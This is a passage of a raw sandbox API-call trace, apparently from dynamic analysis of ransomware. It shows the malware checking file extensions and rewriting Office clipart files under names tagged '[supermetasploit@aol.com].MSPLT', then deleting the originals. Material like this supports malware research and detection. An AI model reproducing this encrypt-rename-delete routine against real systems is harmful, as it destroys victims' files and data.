returned 1 [0296.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0296.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.730] lstrlenW (lpString=".doc") returned 4 [0296.730] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.730] lstrlenW (lpString=".docx") returned 5 [0296.730] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.730] lstrlenW (lpString=".pdf") returned 4 [0296.730] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.730] lstrlenW (lpString=".xls") returned 4 [0296.730] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.730] lstrlenW (lpString=".xlsx") returned 5 [0296.730] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.730] lstrlenW (lpString=".ppt") returned 4 [0296.730] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.730] lstrlenW (lpString=".zip") returned 4 [0296.730] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.730] lstrlenW (lpString=".rar") returned 4 [0296.730] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.731] lstrlenW (lpString=".bz2") returned 4 [0296.731] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.731] lstrlenW (lpString=".7z") returned 3 [0296.731] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.731] lstrlenW (lpString=".dbf") returned 4 [0296.731] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.731] lstrlenW (lpString=".1cd") returned 4 [0296.731] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.731] lstrlenW (lpString=".jpg") returned 4 [0296.731] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.731] lstrlenW (lpString=".doc") returned 4 [0296.731] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.731] lstrlenW (lpString=".docx") returned 5 [0296.731] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.731] lstrlenW (lpString=".pdf") returned 4 [0296.732] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.732] lstrlenW (lpString=".xls") returned 4 [0296.732] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.732] lstrlenW (lpString=".xlsx") returned 5 [0296.732] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.732] lstrlenW (lpString=".ppt") returned 4 [0296.732] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.732] lstrlenW (lpString=".zip") returned 4 [0296.732] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.732] lstrlenW (lpString=".rar") returned 4 [0296.732] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.732] lstrlenW (lpString=".bz2") returned 4 [0296.732] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.732] lstrlenW (lpString=".7z") returned 3 [0296.732] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.732] lstrlenW (lpString=".dbf") returned 4 [0296.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.732] lstrlenW (lpString=".1cd") returned 4 [0296.733] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 68 [0296.733] lstrlenW (lpString=".jpg") returned 4 [0296.733] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.733] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0296.733] lstrlenW (lpString="BD08868_.WMF") returned 12 [0296.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.734] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=40206) returned 1 [0296.734] CloseHandle (hObject=0x3d0) returned 1 [0296.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf")) returned 0x220 [0296.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0296.735] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.736] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0296.737] GetLastError () returned 0x0 [0296.737] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x9d0e, lpOverlapped=0x0) returned 1 [0296.740] WriteFile (in: hFile=0x4c0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x9d10, lpOverlapped=0x0) returned 1 [0296.744] ReadFile (in: hFile=0x3d0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.744] WriteFile (in: hFile=0x4c0, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0296.744] SetEndOfFile (hFile=0x4c0) returned 1 [0296.744] CloseHandle (hObject=0x4c0) returned 1 [0296.748] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.748] SetEndOfFile (hFile=0x3d0) returned 1 [0296.753] CloseHandle (hObject=0x3d0) returned 1 [0296.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0296.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0296.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.756] lstrlenW (lpString=".doc") returned 4 [0296.756] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.756] lstrlenW (lpString=".docx") returned 5 [0296.756] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.756] lstrlenW (lpString=".pdf") returned 4 [0296.756] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.756] lstrlenW (lpString=".xls") returned 4 [0296.756] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.756] lstrlenW (lpString=".xlsx") returned 5 [0296.756] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.756] lstrlenW (lpString=".ppt") returned 4 [0296.756] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.756] lstrlenW (lpString=".zip") returned 4 [0296.756] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.756] lstrlenW (lpString=".rar") returned 4 [0296.756] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.756] lstrlenW (lpString=".bz2") returned 4 [0296.756] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0296.756] lstrlenW (lpString=".7z") returned 3 [0296.756] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0296.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.757] lstrlenW (lpString=".dbf") returned 4 [0296.757] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0296.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.757] lstrlenW (lpString=".1cd") returned 4 [0296.757] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0296.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.757] lstrlenW (lpString=".jpg") returned 4 [0296.757] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0296.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.757] lstrlenW (lpString=".doc") returned 4 [0296.757] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0296.757] lstrlenW (lpString=".docx") returned 5 [0296.757] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0296.757] lstrlenW (lpString=".pdf") returned 4 [0296.757] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0296.757] lstrlenW (lpString=".xls") returned 4 [0296.757] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0296.757] lstrlenW (lpString=".xlsx") returned 5 [0296.757] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0296.757] lstrlenW (lpString=".ppt") returned 4 [0296.757] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0296.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0296.758] lstrlenW (lpString=".zip") returned 4 [0296.758] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0296.758] lstrlenW (lpString=".rar") returned 4 [0296.758] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0296.758] lstrlenW (lpString=".bz2") returned 4 [0296.758] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.150] lstrlenW (lpString=".7z") returned 3 [0297.150] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0297.151] lstrlenW (lpString=".dbf") returned 4 [0297.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0297.151] lstrlenW (lpString=".1cd") returned 4 [0297.151] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 68 [0297.151] lstrlenW (lpString=".jpg") returned 4 [0297.151] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.151] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0297.151] lstrlenW (lpString="BD09194_.WMF") returned 12 [0297.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0297.535] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=14540) returned 1 [0297.535] CloseHandle (hObject=0x440) returned 1 [0297.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf")) returned 0x220 [0297.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0298.156] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.156] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.158] GetLastError () returned 0x0 [0298.158] ReadFile (in: hFile=0x4c8, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x38cc, lpOverlapped=0x0) returned 1 [0298.174] WriteFile (in: hFile=0x42c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x38d0, lpOverlapped=0x0) returned 1 [0298.175] ReadFile (in: hFile=0x4c8, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.175] WriteFile (in: hFile=0x42c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.175] SetEndOfFile (hFile=0x42c) returned 1 [0298.176] CloseHandle (hObject=0x42c) returned 1 [0298.185] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.185] SetEndOfFile (hFile=0x4c8) returned 1 [0298.196] CloseHandle (hObject=0x4c8) returned 1 [0298.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0298.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.198] lstrlenW (lpString=".doc") returned 4 [0298.198] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.198] lstrlenW (lpString=".docx") returned 5 [0298.198] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.198] lstrlenW (lpString=".pdf") returned 4 [0298.198] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.198] lstrlenW (lpString=".xls") returned 4 [0298.198] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.198] lstrlenW (lpString=".xlsx") returned 5 [0298.198] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.198] lstrlenW (lpString=".ppt") returned 4 [0298.198] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.198] lstrlenW (lpString=".zip") returned 4 [0298.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.198] lstrlenW (lpString=".rar") returned 4 [0298.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.198] lstrlenW (lpString=".bz2") returned 4 [0298.198] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.198] lstrlenW (lpString=".7z") returned 3 [0298.198] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.198] lstrlenW (lpString=".dbf") returned 4 [0298.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.199] lstrlenW (lpString=".1cd") returned 4 [0298.199] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.199] lstrlenW (lpString=".jpg") returned 4 [0298.199] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.199] lstrlenW (lpString=".doc") returned 4 [0298.199] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.199] lstrlenW (lpString=".docx") returned 5 [0298.199] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.199] lstrlenW (lpString=".pdf") returned 4 [0298.199] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.199] lstrlenW (lpString=".xls") returned 4 [0298.199] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.199] lstrlenW (lpString=".xlsx") returned 5 [0298.199] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.199] lstrlenW (lpString=".ppt") returned 4 [0298.199] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.199] lstrlenW (lpString=".zip") returned 4 [0298.199] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.199] lstrlenW (lpString=".rar") returned 4 [0298.199] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.200] lstrlenW (lpString=".bz2") returned 4 [0298.200] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.200] lstrlenW (lpString=".7z") returned 3 [0298.200] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.200] lstrlenW (lpString=".dbf") returned 4 [0298.200] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.200] lstrlenW (lpString=".1cd") returned 4 [0298.200] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0298.200] lstrlenW (lpString=".jpg") returned 4 [0298.200] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.200] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.200] lstrlenW (lpString="BD19986_.WMF") returned 12 [0298.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0298.627] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=14486) returned 1 [0298.628] CloseHandle (hObject=0x4c8) returned 1 [0298.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf")) returned 0x220 [0298.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0298.628] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.628] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0298.630] GetLastError () returned 0x0 [0298.630] ReadFile (in: hFile=0x4c8, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x3896, lpOverlapped=0x0) returned 1 [0298.689] WriteFile (in: hFile=0x4cc, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x38a0, lpOverlapped=0x0) returned 1 [0298.691] ReadFile (in: hFile=0x4c8, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.691] WriteFile (in: hFile=0x4cc, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.691] SetEndOfFile (hFile=0x4cc) returned 1 [0298.691] CloseHandle (hObject=0x4cc) returned 1 [0298.693] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.693] SetEndOfFile (hFile=0x4c8) returned 1 [0298.707] CloseHandle (hObject=0x4c8) returned 1 [0298.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.711] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft 